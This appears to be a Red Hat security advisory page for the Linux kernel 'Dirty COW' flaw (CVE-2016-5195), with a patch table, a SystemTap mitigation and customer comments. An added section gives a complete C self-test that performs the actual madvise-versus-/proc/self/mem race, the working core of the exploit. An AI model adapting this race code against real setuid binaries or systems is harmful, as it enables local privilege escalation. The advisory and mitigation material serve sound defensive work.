Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195

Public Date: October 19, 2016, 12:00 am
Status: Resolved
Impact: Important

Red Hat Product Security has been made aware of a vulnerability in the Linux kernel that has been assigned CVE-2016-5195. This issue was publicly disclosed on October 19, 2016 and has been rated as Important. This issue is being referred to as "Dirty COW" in the media.

Background Information

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

This could be abused by an attacker to overwrite existing setuid binaries with code of the attacker's choosing, which then runs with elevated privileges. An exploit using this technique has been found in the wild. This flaw affects most modern Linux distributions.

Red Hat Product Security has rated this update as having a security impact of Important.

Impacted Products

The following Red Hat Product versions are impacted:

  • Red Hat Enterprise Linux 5
  • Red Hat Enterprise Linux 6
  • Red Hat Enterprise Linux 7
  • Red Hat Enterprise MRG 2
  • Red Hat Openshift Online v2
  • Red Hat Virtualization (RHEV-H/RHV-H)

Attack Description and Impact

This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the permission checks that would otherwise prevent modification without write access to the file. The attacker maps the target file read-only and private (mmap with PROT_READ and MAP_PRIVATE), then repeatedly forces a write into that mapping through a path that ignores the page protection (a write to /proc/self/mem, or ptrace with PTRACE_POKEDATA) while a second thread repeatedly calls madvise(MADV_DONTNEED) on the same range. Each madvise call discards the process's private copy-on-write copy of the page; if a write lands in the window after that copy is discarded and before it is recreated, the kernel applies it to the shared page-cache page backing the file instead of to the private copy, and the change is written back to disk.

Diagnose your vulnerability

Determine if your system is vulnerable: Red Hat provides a detection script, rh-cve-2016-5195_2.sh (https://access.redhat.com/sites/default/files/rh-cve-2016-5195_2.sh), that checks the running kernel against the fixed versions listed below.


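The following program, added here as an example and not part of the Red Hat advisory or its detection script, turns the race described under "Attack Description and Impact" into a self-test a practitioner can run without relying on version strings. It maps a file of its own read-only and MAP_PRIVATE, lets one thread hammer the range with madvise(MADV_DONTNEED) while a second thread forces writes into it through /proc/self/mem (the mem_write path that the SystemTap mitigation below hooks), and afterwards reads the file back from disk through a fresh descriptor. On a fixed kernel the writes only ever reach the process-private copy and the file is unchanged; on a vulnerable kernel a write can land in the shared page-cache page and the file changes. The temporary-file path, the iteration count and the payload are the example's own choices; it assumes a writable /tmp, a mounted /proc and a pthreads-capable libc.

```c
/* dirtycow_selfcheck.c: added example, not code from the Red Hat advisory.
 * Build: cc -O2 -pthread dirtycow_selfcheck.c -o dirtycow_selfcheck        */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ORIGINAL "this line must survive on a fixed kernel\n"
#define PAYLOAD  "DIRTY"   /* what the race tries to plant in the file       */
#define ROUNDS   200000    /* attempts per thread (assumed, not from the page) */

struct race {
    void  *map;    /* read-only MAP_PRIVATE mapping of the test file         */
    size_t len;
    int    memfd;  /* /proc/self/mem: lets us write despite PROT_READ        */
};

/* Thread 1: keep discarding the process-private copy of the page so the next
 * write must go through copy-on-write again; that re-copy is the window.    */
static void *dontneed_loop(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < ROUNDS; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: keep writing PAYLOAD at the mapping address via /proc/self/mem
 * (the mem_write path). A fixed kernel always directs this into the private
 * copy; a vulnerable one can hit the shared page-cache page behind the file. */
static void *write_loop(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < ROUNDS; i++)
        if (pwrite(r->memfd, PAYLOAD, strlen(PAYLOAD),
                   (off_t)(unsigned long)r->map) < 0)
            break;
    return NULL;
}

/* Returns 0 if the file on disk survived intact (kernel fixed), 1 if the race
 * modified it (kernel vulnerable), -1 if the test could not be set up.      */
int dirtycow_selfcheck(void)
{
    char path[] = "/tmp/dirtycow-selfcheck-XXXXXX";   /* assumed writable */
    struct race r = { .map = MAP_FAILED, .len = strlen(ORIGINAL), .memfd = -1 };
    int result = -1;
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    /* A file we own but, by permission, cannot write through its path. */
    if (write(fd, ORIGINAL, r.len) != (ssize_t)r.len || fchmod(fd, 0444) != 0)
        goto out;
    close(fd);
    if ((fd = open(path, O_RDONLY)) < 0) goto out;
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED) goto out;
    if ((r.memfd = open("/proc/self/mem", O_RDWR)) < 0) goto out;

    pthread_t t1, t2;
    if (pthread_create(&t1, NULL, dontneed_loop, &r) != 0)
        goto out;
    if (pthread_create(&t2, NULL, write_loop, &r) != 0) {
        pthread_join(t1, NULL);
        goto out;
    }
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    /* Judge by the file content read through a fresh descriptor, not by the
     * mapping: even a fixed kernel shows PAYLOAD in the private copy.       */
    char buf[sizeof ORIGINAL];
    int check = open(path, O_RDONLY);
    if (check >= 0) {
        ssize_t n = read(check, buf, r.len);
        close(check);
        if (n == (ssize_t)r.len)
            result = memcmp(buf, ORIGINAL, r.len) == 0 ? 0 : 1;
    }
out:
    if (r.memfd >= 0) close(r.memfd);
    if (r.map != MAP_FAILED) munmap(r.map, r.len);
    if (fd >= 0) close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int v = dirtycow_selfcheck();
    printf("CVE-2016-5195 self-check: %s\n",
           v < 0 ? "could not run" : v ? "VULNERABLE (file changed)" : "fixed (file intact)");
    return v < 0 ? 2 : v;
}
```

Run it as an unprivileged user before and after booting the fixed kernel. With the SystemTap mitigation below loaded, the /proc/self/mem writes become zero-length no-ops, so the file also stays intact; the check therefore reports the effective state of the running kernel rather than the package version. Note that a single run that leaves the file intact on an unpatched kernel is not proof of safety, since the race is probabilistic; raise ROUNDS or repeat the run if you are testing a kernel you believe to be vulnerable.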
Take Action

All Red Hat customers running the affected versions of the kernel are strongly recommended to update the kernel as soon as patches are available. Details about impacted packages as well as recommended mitigation are noted below. A system reboot is required in order for the kernel update to be applied.

Updates for Affected Products

The fixes for CVE-2016-5195 were included in the recent release of Red Hat Enterprise Linux 7.3.

A kpatch for customers running Red Hat Enterprise Linux 7.2 or greater will be available. Please open a support case to gain access to the kpatch.

For more details about what a kpatch is, see: Is live kernel patching (kpatch) supported in RHEL 7?


Product                                                   Package     Advisory/Update
Red Hat Enterprise Linux 7                                kernel      RHSA-2016:2098
Red Hat Enterprise Linux 7                                kernel-rt   RHSA-2016:2110
Red Hat Enterprise Linux 7.1 Extended Update Support*     kernel      RHSA-2016:2118
Red Hat Enterprise Linux 6                                kernel      RHSA-2016:2105
Red Hat Enterprise Linux 6.7 Extended Update Support*     kernel      RHSA-2016:2106
Red Hat Enterprise Linux 6.6 Advanced Update Support**    kernel      RHSA-2016:2128
Red Hat Enterprise Linux 6.5 Advanced Update Support**    kernel      RHSA-2016:2120
Red Hat Enterprise Linux 6.4 Advanced Update Support**    kernel      RHSA-2016:2133
Red Hat Enterprise Linux 6.2 Advanced Update Support**    kernel      RHSA-2016:2132
Red Hat Enterprise Linux 5                                kernel      RHSA-2016:2124
Red Hat Enterprise Linux 5.9 Advanced Update Support**    kernel      RHSA-2016:2126
Red Hat Enterprise Linux 5.6 Advanced Update Support**    kernel      RHSA-2016:2127
RHEL Atomic Host                                          kernel      images respun on 3 Nov 2016
Red Hat Enterprise MRG 2                                  kernel-rt   RHSA-2016:2107
Red Hat Virtualization (RHEV-H/RHV-H)                     kernel      pending

*An active EUS subscription is required for access to this patch.

Please contact Red Hat sales or your specific sales representative for more information if your account does not have an active EUS subscription.

What is the Red Hat Enterprise Linux Extended Update Support Subscription?

**An active AUS subscription is required for access to this patch in RHEL AUS.

Mitigation

Red Hat Support supplies mitigations like SystemTap scripts as a stop-gap until official patches are released.  SystemTap scripts are only supported for 30 days after the GA release of the final patches.

HOW TO BUILD AND USE THE SYSTEMTAP WORKAROUND

The SystemTap countermeasure builds a kernel module (like a driver) from a SystemTap script that hooks the two kernel entry points the exploit writes through, the /proc/PID/mem write handler (mem_write) and the ptrace system call, and neutralises them. It is used as a stopgap until a fixed kernel is booted on the affected machine. This solution does not require a reboot and applies to RHEL 5, 6 and 7.

It is not possible to build one module that applies to all kernels, not even to one family (all RHEL 5, 6 or 7 kernels). Each specific kernel version requires a .ko generated for that kernel (uname -r).

REQUIREMENTS

In order to build the systemtap module, the following packages are required:

  • systemtap-client
  • systemtap-devel
  • gcc (and dependencies)
  • kernel-devel-`uname -r`
  • kernel-debuginfo-`uname -r`
  • kernel-debuginfo-common-`uname -r`

WARNING: The kernel-devel and kernel-debuginfo packages must match the running kernel exactly. Installing the latest version instead of the running one will prevent SystemTap from working. Please download the exact running version.


WHERE DO I GET THE DEBUGINFOS

Please refer to KB https://access.redhat.com/solutions/9907


HOW DO I BUILD THE MODULE

1. After you have installed the packages, create a file named dirtycow.stp with this content:

// mem_write() is the kernel's write handler for /proc/PID/mem, one of the
// two paths used to force a write into a read-only private mapping.
// Forcing the byte count to 0 turns every such write into a no-op.
// The trailing "?" makes the probe optional, so the script still builds on
// kernels where the symbol cannot be resolved.
probe kernel.function("mem_write").call ? {
        $count = 0
}

// ptrace() is the other write path (PTRACE_POKEDATA). Replacing the request
// with an invalid value makes every ptrace call fail instead of writing.
probe syscall.ptrace {  // includes compat ptrace as well
        $request = 0xfff
}

probe begin {
        printk(0, "CVE-2016-5195 mitigation loaded")
}

probe end {
        printk(0, "CVE-2016-5195 mitigation unloaded")
}

2. Save the file. Compile it using this command:

# stap -g -p 4 -m dirtycow_`uname -r|tr -cd '[:digit:]'` dirtycow.stp
dirtycow_26183985.ko

In the above example, the .ko file name carries the digits of its kernel version; in this case, 2.6.18-398.el5. This module can be used on other systems with this exact kernel version without installing the debuginfo and development packages there; only systemtap-runtime is needed. Just copy the module file to the server with the same kernel version, install the systemtap-runtime package and proceed from the next step.


3. In order to load the module, run the command staprun -L <.ko file>. For example:

# staprun -L dirtycow_26183985.ko

4. Check that it is loaded:

# dmesg | grep CVE-2016-5195
CVE-2016-5195 mitigation loaded

5. To unload the module, reboot the system or run "staprun -A dirtycow_26183985" and interrupt it with Ctrl+C, as shown below:

# staprun -A dirtycow_26183985
^C
Message from syslogd@...
kernel:CVE-2016-5195 mitigation unloaded

IMPORTANT

  • The module does not survive a reboot: it is not reloaded automatically and must be loaded again manually after every boot.
  • If the kernel is updated or changed, this module will not load into the new kernel.
  • If you boot into a different kernel that still lacks the fix, a new module built for that kernel must be loaded.
  • A fixed kernel does not need the module.
  • While the module is loaded, every ptrace request fails, so debuggers and tracers (gdb, strace) will not work until the module is unloaded or the fixed kernel is booted.

Please reference bug 1384344 for detailed mitigation steps.

27 Comments


Updated RHEL 6 kernel package is now available (kernel-2.6.32-642.6.2.el6.x86_64.rpm)

Hi, Our server is running this version:
uname -r
2.6.32-573.el6.x86_64
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 6.7 (Santiago)
Do we need to go for the RHEL 6.7 extended support release kernel version, i.e. 2.6.32-573.35.2.el6.x86_64, or to this version, kernel-2.6.32-642.6.2.el6.x86_64.rpm? Could you confirm please.

Is this for RHEL6U8 or for all other variants? I could see for RHEL 6U7 kernel-2.6.32-573.35.2.el6.x86_64.rpm given as the solution.

But this kernel version kernel-2.6.32-573.35.2.el6.x86_64.rpm is only available with Extended Update Support. If I don't have EUS and I have an application that currently is not compatible with 6.8 and I want to avoid patching to 6.8, what can I do?

Is it safe to use the latest kernel package kernel-3.10.0-327.36.3.el7.x86_64.rpm on a RHEL 7.1 system while installing extra dependencies (dracut, systemd, etc..) from newer releases or will there be a separate package for older RHEL7 (7.1/7.0) systems? For now my goal is to keep a system at 7.1 but have the updated kernel.

Your article says it's ready for RHEL 6, but it's actually not available for download yet?

I'm pulling it down right now -

Any update for RHEL-5?

Hi - The RHEL 5 Errata has been published - details are available at https://rhn.redhat.com/errata/RHSA-2016-2124.html - kernel-2.6.18-416.el5

The link to RHSA-2016:2107 goes to 2016 - typo in the link.

Thank you. I've corrected the link. Regards.

When do you guys show the patch of RHEL 6 at "https://access.redhat.com/labs/psb" ?

Is there something I can audit in auditd (RHEL6) to help detect the possible uses of the exploit while we roll out the patch?

I haven't seen anybody ask about RHEL 4, which is covered under ELS until April, 2017. Should we expect that a patch is forthcoming for this ancient dinosaur, too?

Hi Ben, As noted on page - https://access.redhat.com/security/cve/CVE-2016-5195 - RHEL 4 ELS kernel is not affected by this issue. Regards,

Thanks, Cliff! Don't I feel sheepish... baaaah. :)

Any Update for RHEL-6

Hi, the main RHEL 6 kernel was fixed last week within Errata RHSA-2016:2105 (2016-10-25) - kernel-2.6.32-642.6.2.el6. Details are here - http://rhn.redhat.com/errata/RHSA-2016-2105.html.

The Resolve tab of this article has links to all available variations of RHEL 6, including 6.6 and 6.7 EUS versions.

Regards.

Hi,

The new kernel releases are listed for RH 5.X and 6.X but I can't tell how to DL the actual RPMs. "(The unlinked packages above are only available from the Red Hat Network)": when logging in to the RH portal, I can't find where I can DL the RPMs from.

Another question: Can these kernels be use for CentOS as well?

Thanks

The package named for the mitigation step is different on RHEL5 to RHEL6 and RHEL7 on an x86_64 system.

On RHEL5, one would install the following for a specific kernel to be matched: yum install -y systemtap-client systemtap-devel gcc kernel-$1 kernel-devel-$1 kernel-debuginfo-$1 kernel-debuginfo-common-$1

On RHEL6 or RHEL7, one would install: yum install -y systemtap-client systemtap-devel gcc kernel-$1 kernel-devel-$1 kernel-debuginfo-$1 kernel-debuginfo-common-x86_64-$1

where $1 is equivalent to uname -r in the instructions above.

My kernel versions are 2.6.32-431.el6.x86_64 and 2.6.32-573.el6.x86_64. I am unable to download the fixes. Can anyone help me out?

Hello, If you are having issues downloading packages then you might not have access with your customer portal account or not have the required entitlements. You can open a support case via the customer portal or use: https://access.redhat.com/support/contact/technicalSupport for assistance.

Having to update all my 6.5 kernels :) which would need booting each one once updated, I have installed the suggested "Kernel Module" option as a way to apply some sort of "fix" to the problem. That of course included all steps described at https://access.redhat.com/security/vulnerabilities/DirtyCow?page=1 under section: Mitigation, HOW TO BUILD AND USE THE SYSTEMTAP WORKAROUND. I have just followed the suggested steps, compiled the "ready made kernel module" and loaded it into each machine's kernel. Of course the compiled module could be copied to another 6.5 kernel machine and loaded there.

Are older 2.4.x kernels of RHEL 3 also affected?

Hi, I have a problem with the download: wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_2.sh